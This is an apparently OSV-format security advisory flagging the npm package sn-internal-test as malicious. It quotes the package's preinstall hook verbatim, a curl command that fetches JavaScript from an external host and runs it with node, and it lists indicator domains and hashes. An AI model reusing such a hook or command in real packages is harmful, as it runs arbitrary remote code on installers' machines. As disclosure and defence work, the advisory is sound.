MAL-2026-5645
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sn-internal-test/MAL-2026-5645.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5645
- Published
- 2026-06-11T12:38:09Z
- Modified
- 2026-06-11T13:46:35.308619563Z
- Summary
- Malicious code in sn-internal-test (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d)
package.json declares a preinstall lifecycle script that runs
curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On anynpm installof this package, the installer's machine fetches an unauthenticated, unpinned, mutable JavaScript file from an external author-controlled host and immediately executes it under Node.js with the installer's user privileges, overwriting the package's own index.js. The package describes itself as 'This is our internal app for testing' but is published to the public npm registry with no library functionality — the entire install-time effect is the remote fetch-and-execute. Whatever bytes are served at https://poc.amanrawat.com/hehe.js at install time become arbitrary code running on the installer's machine. The shape is consistent with a dependency-confusion proof-of-concept or active dropper: an internal-sounding name on public npm whose sole behavior is to pull and run remote code. - Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-005714", "versions": [ "1.9.9" ], "sha256": "215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d", "source": "amazon-inspector", "modified_time": "2026-06-11T12:38:22Z", "import_time": "2026-06-11T13:27:19.608506127Z" }, { "id": "IN-MAL-2026-005713", "import_time": "2026-06-11T13:27:19.477924367Z", "sha256": "7a0d57a0150e9a2783ecf0f9e42dc5e5e75c0e51fc17379ce57f99f9030fc64e", "source": "amazon-inspector", "modified_time": "2026-06-11T12:38:09Z", "versions": [ "2.1.1" ] }, { "id": "IN-MAL-2026-005715", "import_time": "2026-06-11T13:27:19.815581075Z", "sha256": "98382d7051ce015fd4cb0d4970d27ca4e798b333fc5a684ffbfe7af2a3010246", "source": "amazon-inspector", "modified_time": "2026-06-11T12:38:23Z", "versions": [ "1.9.9" ] }, { "id": "IN-MAL-2026-005712", "versions": [ "2.1.1" ], "sha256": "9ddef31ce3b7bf8d7d393b847307865e78e02846c3ee11c79900cd6e97a44ac4", "source": "amazon-inspector", "modified_time": "2026-06-11T12:38:09Z", "import_time": "2026-06-11T13:27:19.352219355Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / sn-internal-test
Package
- Name
- sn-internal-test
- View open source insights on deps.dev
- Purl
- pkg:npm/sn-internal-test
Database specific
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
indicators
{
"evidence_files": [
{
"path": "package.json",
"sha256": "bd886cbd60fe0dba22ab66943bb938f67e019454e34a8e441b39ac537aea7d19",
"tlsh": "a6e020308a23553745c415e6886b941fd6518e2f04557c0863ab042d81df57754fd31d"
}
],
"package_integrity": [
{
"filename": "sn-internal-test-1.9.9.tgz",
"hashes": {
"sha512_sri": "sha512-iapPjV0bSDZEYp80p7yADZPKkonSbxIIbyqFrZCs5cvB1mEkVT1lVRcPSvb4J2TiTGTBuJ+lJSGsqKv7QoRL4w==",
"sha1": "003208d03cd50d4f1eb7fd2c203374ec8628d32a"
}
}
],
"domains": [
"poc.amanrawat.com",
"webhook.site"
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sn-internal-test/MAL-2026-5645.json"